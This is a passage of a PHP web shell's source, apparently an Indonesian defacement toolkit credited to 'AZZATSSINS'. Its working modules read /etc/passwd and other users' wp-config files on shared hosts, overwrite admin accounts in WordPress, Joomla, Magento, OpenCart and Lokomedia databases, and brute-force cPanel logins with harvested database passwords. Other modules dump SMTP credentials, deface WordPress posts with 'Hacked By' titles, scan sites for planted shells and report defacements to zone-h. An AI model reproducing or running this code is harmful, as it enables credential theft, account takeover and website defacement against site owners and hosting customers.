2707.                     "/home3/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
2708.                     "/home3/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
2709.                     "/home3/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
2710.                     "/home3/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
2711.                     "/home3/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
2712.                     "/home3/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
2713.                     "/home3/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
2714.                     "/home3/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
2715.                     "/home3/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
2716.                     "/home3/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
2717.                     "/home3/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
2718.                     "/home3/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
2719.                     "/home3/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
2720.                     "/home3/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2721.                     "/home3/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2722.                     "/home3/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
2723.                     "/home3/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
2724.                     "/home3/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
2725.                     "/home3/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
2726.                     "/home3/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
2727.                     "/home3/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
2728.                     "/home3/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
2729.                     "/home3/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
2730.                     "/home3/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
2731.                     "/home3/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
2732.                     "/home3/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
2733.                     "/home3/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2734.                     "/home3/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal"                  
2735.                         ); 
2736.                     foreach($grab_config as $config => $nama_config) {
2737.                         $ambil_config = file_get_contents($config);
2738.                         if($ambil_config == '') {
2739.                         } else {
2740.                             $file_config = fopen("ikiconfig_cok/$usere_cok-$nama_config.txt","w");
2741.                             fputs($file_config,$ambil_config);
2742.                         }
2743.                     }
2744.                 }      
2745.             }
2746.             echo "<center><a href='?dir=$dir/ikiconfig_cok'><font color=lime>Done</font></a></center>";
2747.             }else{
2748.                
2749.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
2750.         echo file_get_contents('/etc/passwd');
2751.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
2752.         }
2753. } elseif($_GET['do'] == 'jumping') {
2754.     $i = 0;
2755.     echo "<pre><div class='margin: 5px auto;'>";
2756.     $etc = fopen("/etc/passwd", "r");
2757.     while($passwd = fgets($etc)) {
2758.         if($passwd == '' || !$etc) {
2759.             echo "<font color=red>Can't read /etc/passwd</font>";
2760.         } else {
2761.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2762.             foreach($user_jumping[1] as $user_idx_jump) {
2763.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
2764.                 if(is_readable($user_jumping_dir)) {
2765.                     $i++;
2766.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2767.                     if(is_writable($user_jumping_dir)) {
2768.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2769.                     }
2770.                     echo $jrw;
2771.                     $domain_jump = file_get_contents("/etc/named.conf");   
2772.                     if($domain_jump == '') {
2773.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
2774.                     } else {
2775.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
2776.                         foreach($domains_jump[1] as $dj) {
2777.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2778.                             $user_jumping_url = $user_jumping_url['name'];
2779.                             if($user_jumping_url == $user_idx_jump) {
2780.                                 echo " => ( <u>$dj</u> )<br>";
2781.                                 break;
2782.                             }
2783.                         }
2784.                     }
2785.                 }
2786.             }
2787.         }
2788.     }
2789.     if($i == 0) {
2790.     } else {
2791.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
2792.     }
2793.     echo "</div></pre>";
2794. } elseif($_GET['do'] == 'auto_edit_user') {
2795.     if($_POST['hajar']) {
2796.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2797.             echo "username atau password harus lebih dari 6 karakter";
2798.         } else {
2799.             $user_baru = $_POST['user_baru'];
2800.             $pass_baru = md5($_POST['pass_baru']);
2801.             $conf = $_POST['config_dir'];
2802.             $scan_conf = scandir($conf);
2803.             foreach($scan_conf as $file_conf) {
2804.                 if(!is_file("$conf/$file_conf")) continue;
2805.                 $config = file_get_contents("$conf/$file_conf");
2806.                 if(preg_match("/JConfig|joomla/",$config)) {
2807.                     $dbhost = ambilkata($config,"host = '","'");
2808.                     $dbuser = ambilkata($config,"user = '","'");
2809.                     $dbpass = ambilkata($config,"password = '","'");
2810.                     $dbname = ambilkata($config,"db = '","'");
2811.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
2812.                     $prefix = $dbprefix."users";
2813.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2814.                     $db = mysql_select_db($dbname);
2815.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2816.                     $result = mysql_fetch_array($q);
2817.                     $id = $result['id'];
2818.                     $site = ambilkata($config,"sitename = '","'");
2819.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2820.                     echo "Config => ".$file_conf."<br>";
2821.                     echo "CMS => Joomla<br>";
2822.                     if($site == '') {
2823.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
2824.                     } else {
2825.                         echo "Sitename => $site<br>";
2826.                     }
2827.                     if(!$update OR !$conn OR !$db) {
2828.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2829.                     } else {
2830.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2831.                     }
2832.                     mysql_close($conn);
2833.                 } elseif(preg_match("/WordPress/",$config)) {
2834.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
2835.                     $dbuser = ambilkata($config,"DB_USER', '","'");
2836.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2837.                     $dbname = ambilkata($config,"DB_NAME', '","'");
2838.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
2839.                     $prefix = $dbprefix."users";
2840.                     $option = $dbprefix."options";
2841.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2842.                     $db = mysql_select_db($dbname);
2843.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2844.                     $result = mysql_fetch_array($q);
2845.                     $id = $result[ID];
2846.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2847.                     $result2 = mysql_fetch_array($q2);
2848.                     $target = $result2[option_value];
2849.                     if($target == '') {
2850.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2851.                     } else {
2852.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2853.                     }
2854.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2855.                     echo "Config => ".$file_conf."<br>";
2856.                     echo "CMS => Wordpress<br>";
2857.                     echo $url_target;
2858.                     if(!$update OR !$conn OR !$db) {
2859.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2860.                     } else {
2861.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2862.                     }
2863.                     mysql_close($conn);
2864.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
2865.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
2866.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
2867.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
2868.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
2869.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
2870.                     $prefix = $dbprefix."admin_user";
2871.                     $option = $dbprefix."core_config_data";
2872.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2873.                     $db = mysql_select_db($dbname);
2874.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2875.                     $result = mysql_fetch_array($q);
2876.                     $id = $result[user_id];
2877.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
2878.                     $result2 = mysql_fetch_array($q2);
2879.                     $target = $result2[value];
2880.                     if($target == '') {
2881.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2882.                     } else {
2883.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2884.                     }
2885.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2886.                     echo "Config => ".$file_conf."<br>";
2887.                     echo "CMS => Magento<br>";
2888.                     echo $url_target;
2889.                     if(!$update OR !$conn OR !$db) {
2890.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2891.                     } else {
2892.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2893.                     }
2894.                     mysql_close($conn);
2895.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2896.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2897.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2898.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2899.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2900.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2901.                     $prefix = $dbprefix."user";
2902.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2903.                     $db = mysql_select_db($dbname);
2904.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2905.                     $result = mysql_fetch_array($q);
2906.                     $id = $result[user_id];
2907.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
2908.                     if($target == '') {
2909.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2910.                     } else {
2911.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2912.                     }
2913.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2914.                     echo "Config => ".$file_conf."<br>";
2915.                     echo "CMS => OpenCart<br>";
2916.                     echo $url_target;
2917.                     if(!$update OR !$conn OR !$db) {
2918.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2919.                     } else {
2920.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2921.                     }
2922.                     mysql_close($conn);
2923.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2924.                     $dbhost = ambilkata($config,'server = "','"');
2925.                     $dbuser = ambilkata($config,'username = "','"');
2926.                     $dbpass = ambilkata($config,'password = "','"');
2927.                     $dbname = ambilkata($config,'database = "','"');
2928.                     $prefix = "users";
2929.                     $option = "identitas";
2930.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2931.                     $db = mysql_select_db($dbname);
2932.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2933.                     $result = mysql_fetch_array($q);
2934.                     $target = $result[alamat_website];
2935.                     if($target == '') {
2936.                         $target2 = $result[url];
2937.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2938.                         if($target2 == '') {
2939.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2940.                         } else {
2941.                             $cek_login3 = file_get_contents("$target2/adminweb/");
2942.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2943.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2944.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2945.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2946.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2947.                             } else {
2948.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2949.                             }
2950.                         }
2951.                     } else {
2952.                         $cek_login = file_get_contents("$target/adminweb/");
2953.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2954.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2955.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2956.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2957.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2958.                         } else {
2959.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2960.                         }
2961.                     }
2962.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2963.                     echo "Config => ".$file_conf."<br>";
2964.                     echo "CMS => Lokomedia<br>";
2965.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
2966.                         echo $url_target2;
2967.                     } else {
2968.                         echo $url_target;
2969.                     }
2970.                     if(!$update OR !$conn OR !$db) {
2971.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2972.                     } else {
2973.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2974.                     }
2975.                     mysql_close($conn);
2976.                 }
2977.             }
2978.         }
2979.     } else {
2980.         echo "<center>
2981.         <h1>Auto Edit User Config</h1>
2982.         <form method='post'>
2983.         DIR Config: <br>
2984.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2985.         Set User & Pass: <br>
2986.         <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
2987.         <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
2988.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
2989.         </form>
2990.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2991.         ";
2992.     }
2993. }elseif($_GET['do'] == 'shelscan') {
2994.     echo'<center><h2>Shell Finder</h2>
2995. <form action="" method="post">
2996. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
2997. <br>
2998. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
2999. </form><br>';
3000. if (isset($_POST["scan"])) {  
3001. $url = $_POST['traget'];
3002. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
3003. echo "Result :<br />";
3004. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
3005. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
3006. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
3007. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
3008. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
3009. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
3010. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
3011. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
3012. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
3013. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
3014. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
3015. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
3016. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
3017. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
3018. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
3019. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
3020. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
3021. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
3022. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
3023. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
3024. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
3025. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
3026. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
3027. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
3028. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
3029. foreach ($shells as $shell){
3030. $headers = get_headers("$url$shell"); //
3031. if (eregi('200', $headers[0])) {
3032. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
3033. $dz = fopen('shells.txt', 'a+');
3034. $suck = "$url$shell";
3035. fwrite($dz, $suck."\n");
3036. }
3037. }
3038. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
3039. }
3040.    
3041. }
3042.  elseif($_GET['do'] == 'cpanel') {
3043.     if($_POST['crack']) {
3044.         $usercp = explode("\r\n", $_POST['user_cp']);
3045.         $passcp = explode("\r\n", $_POST['pass_cp']);
3046.         $i = 0;
3047.         foreach($usercp as $ucp) {
3048.             foreach($passcp as $pcp) {
3049.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3050.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3051.                     } else {
3052.                         $_SESSION[$ucp] = "1";
3053.                         $_SESSION[$pcp] = "1";
3054.                         $i++;
3055.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3056.                     }
3057.                 }
3058.             }
3059.         }
3060.         if($i == 0) {
3061.         } else {
3062.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>AZZATSSINS</font>";
3063.         }
3064.     } else {
3065.         echo "<center>
3066.         <form method='post'>
3067.         USER: <br>
3068.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3069.         $_usercp = fopen("/etc/passwd","r");
3070.         while($getu = fgets($_usercp)) {
3071.             if($getu == '' || !$_usercp) {
3072.                 echo "<font color=red>Can't read /etc/passwd</font>";
3073.             } else {
3074.                 preg_match_all("/(.*?):x:/", $getu, $u);
3075.                 foreach($u[1] as $user_cp) {
3076.                         if(is_dir("/home/$user_cp/public_html")) {
3077.                             echo "$user_cp\n";
3078.                     }
3079.                 }
3080.             }
3081.         }
3082.         echo "</textarea><br>
3083.         PASS: <br>
3084.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3085.         function cp_pass($dir) {
3086.             $pass = "";
3087.             $dira = scandir($dir);
3088.             foreach($dira as $dirb) {
3089.                 if(!is_file("$dir/$dirb")) continue;
3090.                 $ambil = file_get_contents("$dir/$dirb");
3091.                 if(preg_match("/WordPress/", $ambil)) {
3092.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3093.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3094.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3095.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3096.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3097.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3098.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3099.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3100.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3101.                 } elseif(preg_match("/client/", $ambil)) {
3102.                     preg_match("/password=(.*)/", $ambil, $pass1);
3103.                     if(preg_match('/"/', $pass1[1])) {
3104.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3105.                         $pass .= $pass1[1]."\n";
3106.                     }
3107.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3108.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3109.                 }
3110.             }
3111.             echo $pass;
3112.         }
3113.         $cp_pass = cp_pass($dir);
3114.         echo $cp_pass;
3115.         echo "</textarea><br>
3116.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
3117.         </form>
3118.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3119.     }
3120. } elseif($_GET['do'] == 'smtp') {
3121.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
3122.     function scj($dir) {
3123.         $dira = scandir($dir);
3124.         foreach($dira as $dirb) {
3125.             if(!is_file("$dir/$dirb")) continue;
3126.             $ambil = file_get_contents("$dir/$dirb");
3127.             $ambil = str_replace("$", "", $ambil);
3128.             if(preg_match("/JConfig|joomla/", $ambil)) {
3129.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
3130.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
3131.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
3132.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
3133.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
3134.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
3135.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
3136.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
3137.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
3138.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
3139.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
3140.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
3141.             }
3142.         }
3143.     }
3144.     $smpt_hunter = scj($dir);
3145.     echo $smpt_hunter;
3146. } elseif($_GET['do'] == 'auto_wp') {
3147.     if($_POST['hajar']) {
3148.         $title = htmlspecialchars($_POST['new_title']);
3149.         $pn_title = str_replace(" ", "-", $title);
3150.         if($_POST['cek_edit'] == "Y") {
3151.             $script = $_POST['edit_content'];
3152.         } else {
3153.             $script = $title;
3154.         }
3155.         $conf = $_POST['config_dir'];
3156.         $scan_conf = scandir($conf);
3157.         foreach($scan_conf as $file_conf) {
3158.             if(!is_file("$conf/$file_conf")) continue;
3159.             $config = file_get_contents("$conf/$file_conf");
3160.             if(preg_match("/WordPress/", $config)) {
3161.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
3162.                 $dbuser = ambilkata($config,"DB_USER', '","'");
3163.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3164.                 $dbname = ambilkata($config,"DB_NAME', '","'");
3165.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
3166.                 $prefix = $dbprefix."posts";
3167.                 $option = $dbprefix."options";
3168.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3169.                 $db = mysql_select_db($dbname);
3170.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3171.                 $result = mysql_fetch_array($q);
3172.                 $id = $result[ID];
3173.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3174.                 $result2 = mysql_fetch_array($q2);
3175.                 $target = $result2[option_value];
3176.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
3177.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
3178.                 echo "<div style='margin: 5px auto;'>";
3179.                 if($target == '') {
3180.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
3181.                 } else {
3182.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
3183.                 }
3184.                 if(!$update OR !$conn OR !$db) {
3185.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
3186.                 } else {
3187.                     echo "<font color=lime>sukses di ganti.</font><br>";
3188.                 }
3189.                 echo "</div>";
3190.                 mysql_close($conn);
3191.             }
3192.         }
3193.     } else {
3194.         echo "<center>
3195.         <h1>Auto Edit Title+Content WordPress</h1>
3196.         <form method='post'>
3197.         DIR Config: <br>
3198.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3199.         Set Title: <br>
3200.         <input type='text' name='new_title' value='Hacked By AZZATSSINS' placeholder='New Title'><br><br>
3201.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
3202.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
3203.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/raw/A0rGGgJe' style='width: 450px; height: 150px;'></textarea><br>
3204.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
3205.         </form>
3206.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3207.         ";
3208.     }
3209. } elseif($_GET['do'] == 'zoneh') {
3210.     if($_POST['submit']) {
3211.         $domain = explode("\r\n", $_POST['url']);
3212.         $nick =  $_POST['nick'];
3213.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3214.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3215.         function zoneh($url,$nick) {
3216.             $ch = curl_init("http://www.zone-h.com/notify/single");
3217.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3218.                   curl_setopt($ch, CURLOPT_POST, true);
3219.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3220.             return curl_exec($ch);
3221.                   curl_close($ch);
3222.         }
3223.         foreach($domain as $url) {
3224.             $zoneh = zoneh($url,$nick);
3225.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3226.                 echo "$url -> <font color=lime>OK</font><br>";
3227.             } else {
3228.                 echo "$url -> <font color=red>ERROR</font><br>";
3229.             }
3230.         }
3231.     } else {
3232.         echo "<center><form method='post'>
3233.         <u>Defacer</u>: <br>
3234.         <input type='text' name='nick' size='50' value='AZZATSSINS'><br>
3235.         <u>Domains</u>: <br>
3236.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3237.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3238.         </form>";
3239.     }
3240.     echo "</center>";
3241. }elseif($_GET['do'] == 'cpftp_auto') {
3242.     if($_POST['crack']) {
